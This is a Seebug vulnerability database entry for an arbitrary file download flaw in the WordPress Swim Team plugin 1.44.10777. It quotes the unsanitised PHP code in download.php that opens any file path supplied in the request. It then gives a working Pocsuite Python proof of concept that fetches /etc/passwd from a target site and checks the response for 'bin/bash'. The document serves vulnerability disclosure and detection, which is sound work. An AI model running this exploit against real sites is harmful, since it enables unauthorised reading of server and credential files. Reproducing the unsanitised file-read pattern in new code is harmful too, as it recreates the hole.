WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download

2015-09-01T00:00:00
ID SSV:89281
Type seebug
Reporter dropzero
Modified 2015-09-01T00:00:00

Description

<p>The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:</p><p> </p><p> 50             $file = urldecode($args['file']) ;</p><p> 51             $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;</p><p> 52 </p><p> 53             while (!feof($fh))</p><p> 54                 $txt .= fread($fh, 1024) ;</p><p> 55 </p><p> 56             //  Clean up the temporary file - permissions</p><p> 57             //  may prevent this from succeedeing so use the '@'</p><p> 58             //  to suppress any messages from PHP.</p><p> 59 </p><p> 60             @unlink($file) ;</p><p> 61         }</p><p> 62 </p><p> 63         $filename = urldecode($args['filename']) ;</p><p> 64         $contenttype = urldecode($args['contenttype']) ;</p><p> 65 </p><p> 66         // Tell browser to expect a text file of some sort (usually txt or csv)</p><p> 67 </p><p> 68         header(sprintf('Content-Type: application/%s', $contenttype)) ;</p><p> 69         header(sprintf('Content-disposition: attachment; filename=%s', $filename)) ;</p><p> 70         print $txt ;</p>

                                        
                                            
                                                #!/usr/bin/env python
# -*- coding:utf-8 -*-

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = '89281'
    author = 'anonymous'
    vulDate = '2015-07-13'
    createDate = '2015-10-06'
    updateDate = '2015-10-06'
    references = ['http://www.sebug.net/vuldb/ssvid-89281']
    name = 'WordPress Swim Team Plugin Arbitrary File Download'
    appPowerLink = 'https://wordpress.org/plugins/wp-swimteam'
    appName = 'WordPress Swim Team Plugin'
    appVersion = '1.44.10777'
    vulType = 'Arbitrary File Download'
    desc = '''WordPress Swim Team Plugin Arbitrary File Download in download.php file.'''
    samples = ['']

    def _attack(self):
        return self._verify()

    def _verify(self, verify=True):
        result = {}
        vul_url = '%s/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress' % self.url
        response = req.get(vul_url , timeout=10).content

        if 'bin/bash' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output
register(TestPOC)